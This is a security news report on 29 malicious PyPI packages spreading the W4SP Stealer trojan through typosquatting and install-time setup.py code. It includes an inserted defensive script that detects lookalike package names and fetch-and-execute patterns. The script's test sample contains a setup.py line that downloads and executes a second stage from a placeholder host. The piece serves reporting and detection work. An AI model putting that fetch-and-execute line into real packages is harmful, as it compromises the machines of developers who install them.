Cybersecurity researchers have discovered 29 packages in the Python Package Index (PyPI), the official third-party software repository for the Python programming language, that are intended to infect developers' machines with a malware called W4SP Stealer.
"The main attack appears to have started around October 12, 2022 and is slowly gaining momentum towards a focused effort around October 22," software supply chain security firm Phylum said in a report released this week.
The list of problematic packages includes pyslyte, pystyle, pyurllib, algorithms, oiu, iao, curlapi, type-color, and pyhints.
Together, these packages have been downloaded over 5,700 times, and some of them (such as twyne and colorsama) rely on typosquatting to trick unsuspecting users into downloading them.
The malicious modules repurpose existing legitimate libraries by injecting a malicious import statement into otherwise healthy code. The 'setup.py' script in each package launches Python code that retrieves the malware from a remote server.
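As an added illustration (this is not code from the article, from Phylum, or from any of the packages named), the script below applies two checks a defender would want before installing a package, matching the two behaviours described above: it flags names that closely resemble popular libraries (the typosquatting used by twyne and colorsama), and it statically inspects a setup.py for the install-time pattern of importing a network module and executing whatever it fetches. The list of popular package names and the two sample setup.py files are constructed for this example; the heuristics are deliberately simple and produce a "review" verdict rather than a definitive one.

```python
import ast
import difflib

# Constructed list of well-known names; a real tool would derive this from
# download statistics rather than hard-coding a handful of entries.
POPULAR_PACKAGES = ["requests", "colorama", "urllib3", "numpy", "twine"]

# Modules and calls whose presence in setup.py (code that runs at install
# time) warrants a closer look.
NETWORK_MODULES = {"urllib", "requests", "http", "socket"}
NETWORK_CALLS = {"urlopen", "urlretrieve"}
EXEC_CALLS = {"exec", "eval", "__import__"}


def typosquat_candidates(name, popular=POPULAR_PACKAGES, cutoff=0.75):
    """Return popular package names that `name` closely resembles but is not."""
    name = name.lower()
    matches = difflib.get_close_matches(name, popular, n=3, cutoff=cutoff)
    return [m for m in matches if m != name]


def _call_name(node):
    """Best-effort name of the function being called (exec, urlopen, x.read, ...)."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def scan_setup_py(source):
    """Statically inspect setup.py source for fetch-and-execute behaviour.

    Returns a dict with the suspicious imports/calls found and a verdict of
    "review" when a network module is imported AND code execution primitives
    are called, which is the install-time pattern the article describes.
    """
    tree = ast.parse(source)
    findings = {"network_imports": set(), "network_calls": set(), "exec_calls": set()}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    findings["network_imports"].add(alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in NETWORK_MODULES:
                findings["network_imports"].add(node.module)
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in NETWORK_CALLS:
                findings["network_calls"].add(name)
            elif name in EXEC_CALLS:
                findings["exec_calls"].add(name)
    suspicious = findings["network_imports"] and findings["exec_calls"]
    findings["verdict"] = "review" if suspicious else "ok"
    return findings


# Constructed sample: a setup.py that fetches a second stage from a remote
# server and executes it during installation (hostname is a placeholder).
SUSPICIOUS_SETUP = '''
from setuptools import setup
from urllib.request import urlopen
exec(urlopen("http://example.invalid/stage2.py").read())
setup(name="examplepkg", version="0.1")
'''

# Constructed sample: an ordinary setup.py with no install-time side effects.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="mylib", version="1.0", packages=["mylib"])
'''


if __name__ == "__main__":
    for pkg in ("twyne", "colorsama", "requests"):
        print(f"{pkg}: resembles {typosquat_candidates(pkg) or 'nothing popular'}")
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        result = scan_setup_py(src)
        print(f"{label} setup.py -> {result['verdict']} {result}")
```

Both checks are cheap enough to run in CI before `pip install` of a new dependency. The name check will produce false positives for legitimate forks and near-names, and the setup.py scan only sees what is literally in the file (string-built or obfuscated imports escape it), so treat a "review" verdict as a prompt for a human look at the package rather than an automatic block.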
W4SP Stealer is an open source, Python-based trojan.
This is not the first time W4SP Stealer has been distributed via seemingly harmless packages in the PyPI repository. In August, Kaspersky found two libraries named pyquest and ultrarequests that deployed the malware as the final payload.
The findings show continued abuse of the open source ecosystem to spread malicious packages designed to collect sensitive information and pave the way for supply chain attacks.
Phylum said, “We expect to see more malware like this in the near future, as this is an ongoing campaign with ever-changing tactics by determined attackers.”